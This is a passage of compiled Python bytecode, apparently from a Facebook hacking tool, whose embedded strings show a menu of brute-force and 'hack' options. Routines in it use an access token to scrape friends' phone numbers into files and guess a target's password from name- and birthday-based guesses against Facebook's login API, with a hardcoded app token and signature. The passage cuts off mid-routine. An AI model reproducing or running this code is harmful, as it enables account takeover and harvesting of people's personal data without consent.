x1a\x00t\x15\x00t\x11\x00\x83\x01\x00\x16GHt\x1b\x00d\x1b\x00\x83\x01\x00}\x07\x00t\x00\x00j\x1c\x00d\x0c\x00d\x1c\x00|\x07\x00\x17\x83\x02\x00\x01d\x1d\x00|\x07\x00\x17GHt\x1b\x00d\x1e\x00\x83\x01\x00\x01t\x1d\x00\x83\x00\x00\x01Wn\x9b\x00\x04t\x04\x00k\n\x00r@\x02\x01\x01\x01d\x1f\x00GHt\x1b\x00d\x1e\x00\x83\x01\x00\x01t\x1d\x00\x83\x00\x00\x01nu\x00\x04t\x1e\x00t\x1f\x00f\x02\x00k\n\x00rl\x02\x01\x01\x01d \x00GHt\x1b\x00d\x1e\x00\x83\x01\x00\x01t\x1d\x00\x83\x00\x00\x01nI\x00\x04t\x19\x00k\n\x00r\x92\x02\x01\x01\x01d!\x00GHt\x1b\x00d\x1e\x00\x83\x01\x00\x01t\x1d\x00\x83\x00\x00\x01n#\x00\x04t\x0c\x00j 
\x00j!\x00k\n\x00r\xb4\x02\x01\x01\x01d"\x00GHt"\x00\x83\x00\x00\x01n\x01\x00Xd\x00\x00S(#\x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00R\x90\x00\x00\x00s:\x00\x00\x00\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mGet all friend number phone \x1b[1;97m...i*\x00\x00\x00s\n\x00\x00\x00\x1b[1;97m\xe2\x95\x90s3\x00\x00\x00https://graph.facebook.com/me/friends?access_token=s\x13\x00\x00\x00out/nomer_teman.txtR\x11\x00\x00\x00Rl\x00\x00\x00s\x1b\x00\x00\x00https://graph.facebook.com/Rj\x00\x00\x00s\x0e\x00\x00\x00?access_token=Rw\x00\x00\x00s\x01\x00\x00\x00\ns\x11\x00\x00\x00\r\x1b[1;97m[ \x1b[1;92ms\x1a\x00\x00\x00\x1b[1;97m ]\x1b[1;97m=> \x1b[1;97ms\x03\x00\x00\x00 | R0\x00\x00\x00g-C\x1c\xeb\xe26\x1a?sF\x00\x00\x00\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mSuccessfully get number \x1b[1;97m....s2\x00\x00\x00\r\x1b[1;91m[+] \x1b[1;92mTotal Number \x1b[1;91m: \x1b[1;97m%ss7\x00\x00\x00\r\x1b[1;91m[+] \x1b[1;92mSave file with name\x1b[1;91m :\x1b[1;97m s\x04\x00\x00\x00out/s2\x00\x00\x00\r\x1b[1;91m[+] \x1b[1;92mFile saved \x1b[1;91m: \x1b[1;97mout/s\x1e\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]s\x1e\x00\x00\x00\x1b[1;91m[!] Error creating files\x12\x00\x00\x00\x1b[1;91m[!] Stoppeds\x10\x00\x00\x00\x1b[1;91m[!] Errors\x1a\x00\x00\x00\x1b[1;91m[\xe2\x9c\x96] No connection(#\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R\x91\x00\x00\x00R\x92\x00\x00\x00R.\x00\x00\x00R \x00\x00\x00Rb\x00\x00\x00Rc\x00\x00\x00Rd\x00\x00\x00Re\x00\x00\x00Rf\x00\x00\x00t\x02\x00\x00\x00hpR\x94\x00\x00\x00R\x19\x00\x00\x00R\x17\x00\x00\x00R\x0e\x00\x00\x00R\x06\x00\x00\x00R\x18\x00\x00\x00R\x1b\x00\x00\x00R,\x00\x00\x00Rg\x00\x00\x00R/\x00\x00\x00R\x95\x00\x00\x00R\x80\x00\x00\x00R\x96\x00\x00\x00R\x97\x00\x00\x00Ri\x00\x00\x00R\x01\x00\x00\x00R\x08\x00\x00\x00(\x08\x00\x00\x00R4\x00\x00\x00Rk\x00\x00\x00R\'\x00\x00\x00R\x1e\x00\x00\x00R\x98\x00\x00\x00t\x01\x00\x00\x00nR\x10\x00\x00\x00R\x99\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\x8d\x00\x00\x00@\x03\x00\x00sp\x00\x00\x00\x00\x01\r\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\x03\x01\x11\x01\r\x01\x04\x01\x03\x01\r\x01\x05\x01\n\x01\t\x01\n\x01\x0f\x01\x12\x01\x0f\x01\x11\x01\x1f\x01\x12\x01\x03\x01\x11\x01\x15\x010\x00\r\x00\x11\x01\r\x01\x08\x01\n\x01\t\x01\x05\x01\x0f\x01\x0c\x01\x14\x01\t\x01\n\x01\x0b\x01\r\x01\x05\x01\n\x01\n\x01\x13\x01\x05\x01\n\x01\n\x01\r\x01\x05\x01\n\x01\n\x01\x13\x01\x05\x01c\x00\x00\x00\x00\x0b\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s/\x03\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x19\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00}\x00\x00Wn7\x00\x04t\x04\x00k\n\x00r_\x00\x01\x01\x01d\x04\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x05\x00j\x06\x00d\x06\x00\x83\x01\x00\x01t\x07\x00\x83\x00\x00\x01n\x01\x00Xy\x11\x00t\x00\x00j\x08\x00d\x07\x00\x83\x01\x00\x01Wn\x11\x00\x04t\t\x00k\n\x00r\x84\x00\x01\x01\x01n\x01\x00Xy\x08\x02t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\n\x00GHt\x0b\x00d\x08\x00\x83\x01\x00}\x01\x00y>\x00t\x0c\x00j\r\x00d\t\x00|\x01\x00\x17d\n\x00\x17|\x00\x00\x17\x83\x01\x00}\x02\x00t\x0e\x00j\x0f\x00|\x02\x00j\x10\x00\x83\x01\x00}\x03\x00d\x0b\x00|\x03\x00d\x0c\x00\x19\x17GHWn\'\x00\x04t\x11\x00k\n\x00r\r\x01\x01\x01\x01d\r\x00GHt\x0b\x00d\x0e\x00\x83\x01\x00\x01t\x12\x00\x83\x00\x00\x01n\x01\x00Xt\x0c\x00j\r\x00d\t\x00|\x01\x00\x17d\x0f\x0
0\x17|\x00\x00\x17\x83\x01\x00}\x04\x00t\x0e\x00j\x0f\x00|\x04\x00j\x10\x00\x83\x01\x00}\x05\x00t\x13\x00d\x10\x00\x83\x01\x00\x01d\x11\x00d\x12\x00\x14GHt\x02\x00d\x13\x00d\x14\x00\x83\x02\x00}\x06\x00x\xcb\x00|\x05\x00d\x15\x00\x19D]\xbf\x00}\x07\x00t\x0c\x00j\r\x00d\t\x00|\x07\x00d\x16\x00\x19\x17d\n\x00\x17|\x00\x00\x17\x83\x01\x00}\x08\x00t\x0e\x00j\x0f\x00|\x08\x00j\x10\x00\x83\x01\x00}\t\x00yt\x00t\x14\x00j\x15\x00|\t\x00d\x17\x00\x19\x83\x01\x00\x01|\x06\x00j\x16\x00|\t\x00d\x17\x00\x19d\x18\x00\x17\x83\x01\x00\x01d\x19\x00t\x17\x00t\x18\x00t\x14\x00\x83\x01\x00\x83\x01\x00\x17d\x1a\x00\x17|\t\x00d\x17\x00\x19\x17d\x1b\x00\x17|\t\x00d\x0c\x00\x19\x17d\x18\x00\x17Gt\x19\x00j\x1a\x00j\x1b\x00\x83\x00\x00\x01t\x05\x00j\x06\x00d\x1c\x00\x83\x01\x00\x01Wqh\x01\x04t\x11\x00k\n\x00r&\x02\x01\x01\x01qh\x01Xqh\x01W|\x06\x00j\x1c\x00\x83\x00\x00\x01d\x11\x00d\x12\x00\x14GHd\x1d\x00GHd\x1e\x00t\x18\x00t\x14\x00\x83\x01\x00\x16GHt\x0b\x00d\x1f\x00\x83\x01\x00}\n\x00t\x00\x00j\x1d\x00d\x13\x00d \x00|\n\x00\x17\x83\x02\x00\x01d!\x00|\n\x00\x17GHt\x0b\x00d\x0e\x00\x83\x01\x00\x01t\x12\x00\x83\x00\x00\x01Wn\x9b\x00\x04t\x04\x00k\n\x00r\xb6\x02\x01\x01\x01d"\x00GHt\x0b\x00d\x0e\x00\x83\x01\x00\x01t\x12\x00\x83\x00\x00\x01nu\x00\x04t\x1e\x00t\x1f\x00f\x02\x00k\n\x00r\xe2\x02\x01\x01\x01d#\x00GHt\x0b\x00d\x0e\x00\x83\x01\x00\x01t\x12\x00\x83\x00\x00\x01nI\x00\x04t\x11\x00k\n\x00r\x08\x03\x01\x01\x01d$\x00GHt\x0b\x00d\x0e\x00\x83\x01\x00\x01t\x12\x00\x83\x00\x00\x01n#\x00\x04t\x0c\x00j \x00j!\x00k\n\x00r*\x03\x01\x01\x01d%\x00GHt"\x00\x83\x00\x00\x01n\x01\x00Xd\x00\x00S(&\x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00R\x90\x00\x00\x00s2\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mInput ID friend \x1b[1;91m: \x1b[1;97ms\x1b\x00\x00\x00https://graph.facebook.com/s\x0e\x00\x00\x00?access_token=s7\x00\x00\x00\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m R0\x00\x00\x00s\x1b\x00\x00\x00\x1b[1;91m[!] Friend not founds\x1e\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]s\x16\x00\x00\x00/friends?access_token=s@\x00\x00\x00\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mGet all friend number from friend \x1b[1;97m...i*\x00\x00\x00s\n\x00\x00\x00\x1b[1;97m\xe2\x95\x90s\x1b\x00\x00\x00out/no_teman_from_teman.txtR\x11\x00\x00\x00Rl\x00\x00\x00Rj\x00\x00\x00Rw\x00\x00\x00s\x01\x00\x00\x00\ns\x11\x00\x00\x00\r\x1b[1;97m[ \x1b[1;92ms\x1a\x00\x00\x00\x1b[1;97m ]\x1b[1;97m=> \x1b[1;97ms\x03\x00\x00\x00 | g-C\x1c\xeb\xe26\x1a?sF\x00\x00\x00\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mSuccessfully get number \x1b[1;97m....s2\x00\x00\x00\r\x1b[1;91m[+] \x1b[1;92mTotal Number \x1b[1;91m: \x1b[1;97m%ss7\x00\x00\x00\r\x1b[1;91m[+] \x1b[1;92mSave file with name\x1b[1;91m :\x1b[1;97m s\x04\x00\x00\x00out/s2\x00\x00\x00\r\x1b[1;91m[+] \x1b[1;92mFile saved \x1b[1;91m: \x1b[1;97mout/s\x1e\x00\x00\x00\x1b[1;91m[!] Error creating files\x12\x00\x00\x00\x1b[1;91m[!] Stoppeds\x10\x00\x00\x00\x1b[1;91m[!] 
Errors\x1a\x00\x00\x00\x1b[1;91m[\xe2\x9c\x96] No connection(#\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R\x91\x00\x00\x00R\x92\x00\x00\x00R.\x00\x00\x00R/\x00\x00\x00Rb\x00\x00\x00Rc\x00\x00\x00Rd\x00\x00\x00Re\x00\x00\x00Rf\x00\x00\x00R,\x00\x00\x00R\x80\x00\x00\x00R \x00\x00\x00t\x0b\x00\x00\x00hpfromtemanR\x94\x00\x00\x00R\x19\x00\x00\x00R\x17\x00\x00\x00R\x0e\x00\x00\x00R\x06\x00\x00\x00R\x18\x00\x00\x00R\x1b\x00\x00\x00Rg\x00\x00\x00R\x95\x00\x00\x00R\x96\x00\x00\x00R\x97\x00\x00\x00Ri\x00\x00\x00R\x01\x00\x00\x00R\x08\x00\x00\x00(\x0b\x00\x00\x00R4\x00\x00\x00R\x9c\x00\x00\x00R\x9d\x00\x00\x00R\x9e\x00\x00\x00R\'\x00\x00\x00Rm\x00\x00\x00R\x98\x00\x00\x00R\x13\x00\x00\x00R\x10\x00\x00\x00R\x1e\x00\x00\x00R\x99\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\x8e\x00\x00\x00y\x03\x00\x00s\x80\x00\x00\x00\x00\x01\r\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\x03\x01\x11\x01\r\x01\x04\x01\x03\x01\r\x01\x05\x01\x0c\x01\x03\x01\x1b\x01\x12\x01\x11\x01\r\x01\x05\x01\n\x01\x0b\x01\x1b\x01\x12\x01\n\x01\t\x01\x0f\x01\x11\x01\x1f\x01\x12\x01\x03\x01\x11\x01\x15\x010\x00\r\x00\x11\x01\r\x01\x08\x01\n\x01\t\x01\x05\x01\x0f\x01\x0c\x01\x14\x01\t\x01\n\x01\x0b\x01\r\x01\x05\x01\n\x01\n\x01\x13\x01\x05\x01\n\x01\n\x01\r\x01\x05\x01\n\x01\n\x01\x13\x01\x05\x01c\x00\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s\xa0\x00\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x19\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00}\x00\x00Wn7\x00\x04t\x04\x00k\n\x00r_\x00\x01\x01\x01d\x04\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x05\x00j\x06\x00d\x06\x00\x83\x01\x00\x01t\x07\x00\x83\x00\x00\x01n\x01\x00Xt\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x08\x00GHd\x07\x00GHd\x08\x00GHd\t\x00GHd\n\x00GHd\x0b\x00GHd\x0c\x00GHd\r\x00GHt\t\x00\x83\x00\x00\x01d\x00\x00S(\x0e\x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] 
Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00sN\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m1.\x1b[1;97m Mini Hack Facebook(\x1b[1;92mTarget\x1b[1;97m)s?\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m2.\x1b[1;97m Multi Bruteforce FacebooksE\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m3.\x1b[1;97m Super Multi Bruteforce FacebooksF\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m4.\x1b[1;97m BruteForce(\x1b[1;92mTarget\x1b[1;97m)s3\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m5.\x1b[1;97m Yahoo Checkers*\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;91m0.\x1b[1;97m Backs\x03\x00\x00\x00\xe2\x95\x91(\n\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R.\x00\x00\x00t\n\x00\x00\x00hack_pilih(\x01\x00\x00\x00R4\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>Rv\x00\x00\x00\xba\x03\x00\x00s$\x00\x00\x00\x00\x01\r\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\r\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01c\x00\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00s\xc2\x00\x00\x00t\x00\x00d\x01\x00\x83\x01\x00}\x00\x00|\x00\x00d\x02\x00k\x02\x00r\'\x00d\x03\x00GHt\x01\x00\x83\x00\x00\x01n\x97\x00|\x00\x00d\x04\x00k\x02\x00r=\x00t\x02\x00\x83\x00\x00\x01n\x81\x00|\x00\x00d\x05\x00k\x02\x00rZ\x00t\x03\x00\x83\x00\x00\x01t\x04\x00\x83\x00\x00\x01nd\x00|\x00\x00d\x06\x00k\x02\x00rp\x00t\x05\x00\x83\x00\x00\x01nN\x00|\x00\x00d\x07\x00k\x02\x00r\x86\x00t\x06\x00\x83\x00\x00\x01n8\x00|\x00\x00d\x08\x00k\x02\x00r\x9c\x00t\x07\x00\x83\x00\x00\x01n"\x00|\x00\x00d\t\x00k\x02\x00r\xb2\x00t\x08\x00\x83\x00\x00\x01n\x0c\x00d\x03\x00GHt\x01\x00\x83\x00\x00\x01d\x00\x00S(\n\x00\x00\x00Ns\x1d\x00\x00\x00\x1b[1;97m\xe2\x95\x9a\xe2\x95\x90\x1b[1;91mD \x1b[1;97mR\n\x00\x00\x00s\x16\x00\x00\x00\x1b[1;91m[!] 
Wrong inputR8\x00\x00\x00R9\x00\x00\x00Rs\x00\x00\x00Rt\x00\x00\x00R\x81\x00\x00\x00R:\x00\x00\x00(\t\x00\x00\x00R/\x00\x00\x00R\xaa\x00\x00\x00t\x04\x00\x00\x00minit\x05\x00\x00\x00crackt\x05\x00\x00\x00hasilt\x05\x00\x00\x00supert\x05\x00\x00\x00brutet\n\x00\x00\x00menu_yahooR+\x00\x00\x00(\x01\x00\x00\x00t\x04\x00\x00\x00hack(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\xaa\x00\x00\x00\xce\x03\x00\x00s&\x00\x00\x00\x00\x01\x0c\x01\x0c\x01\x05\x01\n\x01\x0c\x01\n\x01\x0c\x01\x07\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x02\x05\x01c\x00\x00\x00\x00\x10\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s\x05\x07\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x19\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00}\x00\x00Wn7\x00\x04t\x04\x00k\n\x00r_\x00\x01\x01\x01d\x04\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x05\x00j\x06\x00d\x06\x00\x83\x01\x00\x01t\x07\x00\x83\x00\x00\x01n\x01\x00Xt\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x08\x00GHd\x07\x00GHd\x08\x00d\t\x00\x14GHyW\x06t\t\x00d\n\x00\x83\x01\x00}\x01\x00t\n\x00d\x0b\x00\x83\x01\x00\x01t\x0b\x00j\x0c\x00d\x0c\x00|\x01\x00\x17d\r\x00\x17|\x00\x00\x17\x83\x01\x00}\x02\x00t\r\x00j\x0e\x00|\x02\x00j\x0f\x00\x83\x01\x00}\x03\x00d\x0e\x00|\x03\x00d\x0f\x00\x19\x17GHt\n\x00d\x10\x00\x83\x01\x00\x01t\x05\x00j\x06\x00d\x11\x00\x83\x01\x00\x01t\n\x00d\x12\x00\x83\x01\x00\x01t\x05\x00j\x06\x00d\x11\x00\x83\x01\x00\x01d\x08\x00d\t\x00\x14GH|\x03\x00d\x13\x00\x19d\x14\x00\x17}\x04\x00t\x10\x00j\x11\x00d\x15\x00|\x01\x00\x17d\x16\x00\x17|\x04\x00\x17d\x17\x00\x17\x83\x01\x00}\x05\x00t\r\x00j\x12\x00|\x05\x00\x83\x01\x00}\x06\x00d\x18\x00|\x06\x00k\x06\x00r\x8a\x01d\x19\x00GHd\x1a\x00|\x03\x00d\x0f\x00\x19\x17GHd\x1b\x00|\x01\x00\x17GHd\x1c\x00|\x04\x00\x17GHt\t\x00d\x1d\x00\x83\x01\x00\x01t\x13\x00\x83\x00\x00\x01nL\x05d\x1e\x00|\x06\x00d\x1f\x00\x19k\x06\x00r\xd7\x01d\x19\x00GHd \x00GHd\x1a\x00|\x03\x00d\x0f\x00\x19\x17GHd\x1b\x00|\x01\x00\x17GHd\x1c\x00|\x04\x00\x17GHt\t\x00d\x1d\x00\x83\x01\x00\x01t\x13\x00\x83\x00\x00\x01n\xff\x04|\x03\x00d!\x00\x19}\x07\x00t\x10\x00j\x11\x00d\x15\x00|\x01\x00\x17d\x16\x00\x17|\x07\x00\x17d\x17\x00\x17\x83\x01\x00}\x05\x00t\r\x00j\x12\x00|\x05\x00\x83\x01\x00}\x06\x00d\x18\x00|\x06\x00k\x06\x00rS\x02d\x19\x00GHd\x1a\x00|\x03\x00d\x0f\x00\x19\x17GHd\x1b\x00|\x01\x00\x17GHd\x1c\x00|\x07\x00\x17GHt\t\x00d\x1d\x00\x83\x01\x00\x01t\x13\x00\x83\x00\x00\x01n\x83\x04d\x1e\x00|\x06\x00d\x1f\x00\x19k\x06\x00r\xa0\x02d\x19\x00GHd \x00GHd\x1a\x00|\x03\x00d\x0f\x00\x19\x17GHd\x1b\x00|\x01\x00\x17GHd\x1c\x00|\x07\x00\x17GHt\t\x00d\x1d\x00\x83\x01\x00\x01t\x13\x00\x83\x00\x00\x01n6\x04|\x03\x00d"\x00\x19d#\x00\x17}\x08\x00t\x10\x00j\x11\x00d\x15\x00|\x01\x00\x17d\x16\x00\x17|\x08\x00\x17d\x17\x00\x17\x83\x01\x00}\x05\x00t\r\x00j\x12\x00|\x05\x00\x83\x01\x00}\x06\x00d\x18\x00|\x06\x00k\x06\x00r \x03d\x19\x00GHd\x1a\x00|\x03\x00d\x0f\x00\x19\x17GHd\x1b\x00|\x01\x00\x17GHd\x1c\x00|\x08\x00\x17GHt\t\x00d\x1d\x00\x83\x01\x00\x01t\x13\x00\x83\x00\x00\x01n\xb6\x03d\x1e\x00|\x06\x00d\x1f\x00\x19k\x06\x00rm\x03d\x19\x00GHd 
\x00GHd\x1a\x00|\x03\x00d\x0f\x00\x19\x17GHd\x1b\x00|\x01\x00\x17GHd\x1c\x00|\x08\x00\x17GHt\t\x00d\x1d\x00\x83\x01\x00\x01t\x13\x00\x83\x00\x00\x01ni\x03|\x03\x00d$\x00\x19}\t\x00|\t\x00j\x14\x00d%\x00d&\x00\x83\x02\x00}\n\x00t\x10\x00j\x11\x00d\x15\x00|\x01\x00\x17d\x16\x00\x17|\n\x00\x17d\x17\x00\x17\x83\x01\x00}\x05\x00t\r\x00j\x12\x00|\x05\x00\x83\x01\x00}\x06\x00d\x18\x00|\x06\x00k\x06\x00r\xfb\x03d\x19\x00GHd\x1a\x00|\x03\x00d\x0f\x00\x19\x17GHd\x1b\x00|\x01\x00\x17GHd\x1c\x00|\n\x00\x17GHt\t\x00d\x1d\x00\x83\x01\x00\x01t\x13\x00\x83\x00\x00\x01n\xdb\x02d\x1e\x00|\x06\x00d\x1f\x00\x19k\x06\x00rH\x04d\x19\x00GHd \x00GHd\x1a\x00|\x03\x00d\x0f\x00\x19\x17GHd\x1b\x00|\x01\x00\x17GHd\x1c\x00|\n\x00\x17GHt\t\x00d\x1d\x00\x83\x01\x00\x01t\x13\x00\x83\x00\x00\x01n\x8e\x02|\x03\x00d$\x00\x19}\x0b\x00|\x0b\x00j\x14\x00d%\x00d&\x00\x83\x02\x00}\x0c\x00|\x03\x00d\x13\x00\x19|\x0c\x00\x17}\r\x00t\x10\x00j\x11\x00d\x15\x00|\x01\x00\x17d\x16\x00\x17|\r\x00\x17d\x17\x00\x17\x83\x01\x00}\x05\x00t\r\x00j\x12\x00|\x05\x00\x83\x01\x00}\x06\x00d\x18\x00|\x06\x00k\x06\x00r\xe4\x04d\x19\x00GHd\x1a\x00|\x03\x00d\x0f\x00\x19\x17GHd\x1b\x00|\x01\x00\x17GHd\x1c\x00|\r\x00\x17GHt\t\x00d\x1d\x00\x83\x01\x00\x01t\x13\x00\x83\x00\x00\x01n\xf2\x01d\x1e\x00|\x06\x00d\x1f\x00\x19k\x06\x00r1\x05d\x19\x00GHd \x00GHd\x1a\x00|\x03\x00d\x0f\x00\x19\x17GHd\x1b\x00|\x01\x00\x17GHd\x1c\x00|\r\x00\x17GHt\t\x00d\x1d\x00\x83\x01\x00\x01t\x13\x00\x83\x00\x00\x01n\xa5\x01d\'\x00}\x0e\x00t\x10\x00j\x11\x00d\x15\x00|\x01\x00\x17d\x16\x00\x17|\x0e\x00\x17d\x17\x00\x17\x83\x01\x00}\x05\x00t\r\x00j\x12\x00|\x05\x00\x83\x01\x00}\x06\x00d\x18\x00|\x06\x00k\x06\x00r\xa9\x05d\x19\x00GHd\x1a\x00|\x03\x00d\x0f\x00\x19\x17GHd\x1b\x00|\x01\x00\x17GHd\x1c\x00|\x0e\x00\x17GHt\t\x00d\x1d\x00\x83\x01\x00\x01t\x13\x00\x83\x00\x00\x01n-\x01d\x1e\x00|\x06\x00d\x1f\x00\x19k\x06\x00r\xf6\x05d\x19\x00GHd \x00GHd\x1a\x00|\x03\x00d\x0f\x00\x19\x17GHd\x1b\x00|\x01\x00\x17GHd\x1c\x00|\x0e\x00\x17GHt\t\x00d\x1d\x00\x83\x01\x00\x01t\x13\x00\x83\x00\x00\x01n\xe0\x00d(\x00}\x0f\x00t\x10\x00j\x11\x00d\x15\x00|\x01\x00\x17d\x16\x00\x17|\x0f\x00\x17d\x17\x00\x17\x83\x01\x00}\x05\x00t\r\x00j\x12\x00|\x05\x00\x83\x01\x00}\x06\x00d\x18\x00|\x06\x00k\x06\x00rn\x06d\x19\x00GHd\x1a\x00|\x03\x00d\x0f\x00\x19\x17GHd\x1b\x00|\x01\x00\x17GHd\x1c\x00|\x0f\x00\x17GHt\t\x00d\x1d\x00\x83\x01\x00\x01t\x13\x00\x83\x00\x00\x01nh\x00d\x1e\x00|\x06\x00d\x1f\x00\x19k\x06\x00r\xbb\x06d\x19\x00GHd \x00GHd\x1a\x00|\x03\x00d\x0f\x00\x19\x17GHd\x1b\x00|\x01\x00\x17GHd\x1c\x00|\x0e\x00\x17GHt\t\x00d\x1d\x00\x83\x01\x00\x01t\x13\x00\x83\x00\x00\x01n\x1b\x00d)\x00GHd*\x00GHt\t\x00d\x1d\x00\x83\x01\x00\x01t\x13\x00\x83\x00\x00\x01Wn\'\x00\x04t\x15\x00k\n\x00r\x00\x07\x01\x01\x01d+\x00GHt\t\x00d\x1d\x00\x83\x01\x00\x01t\x13\x00\x83\x00\x00\x01n\x01\x00Xd\x00\x00S(,\x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] 
Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00se\x00\x00\x00\x1b[1;97m[\x1b[1;91mINFO\x1b[1;97m] \x1b[1;91mThe target account must be friends\n with your account first!i*\x00\x00\x00s\n\x00\x00\x00\x1b[1;97m\xe2\x95\x90s,\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mTarget ID \x1b[1;91m:\x1b[1;97m s,\x00\x00\x00\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mWait a minute \x1b[1;97m...s\x1b\x00\x00\x00https://graph.facebook.com/s\x0e\x00\x00\x00?access_token=s"\x00\x00\x00\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mName\x1b[1;97m : R0\x00\x00\x00s"\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mCheck \x1b[1;97m...i\x02\x00\x00\x00s*\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mOpen password \x1b[1;97m...t\n\x00\x00\x00first_namet\x05\x00\x00\x0012345s\x91\x00\x00\x00https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=s\x17\x00\x00\x00&locale=en_US&password=sH\x00\x00\x00&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6RQ\x00\x00\x00s\x17\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mFounds4\x00\x00\x00\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : s&\x00\x00\x00\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : s&\x00\x00\x00\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : s\x1e\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]s\x10\x00\x00\x00www.facebook.comt\t\x00\x00\x00error_msgs$\x00\x00\x00\x1b[1;91m[!] \x1b[1;93mAccount Checkpointt\x06\x00\x00\x00sayangt\t\x00\x00\x00last_namet\x03\x00\x00\x00123Ry\x00\x00\x00t\x01\x00\x00\x00/R\n\x00\x00\x00t\t\x00\x00\x00kontol123t\t\x00\x00\x00sayang123s7\x00\x00\x00\x1b[1;91m[!] Sorry, failed to open the target password :(s\x1e\x00\x00\x00\x1b[1;91m[!] try it another way.s\x1b\x00\x00\x00\x1b[1;91m[!] 
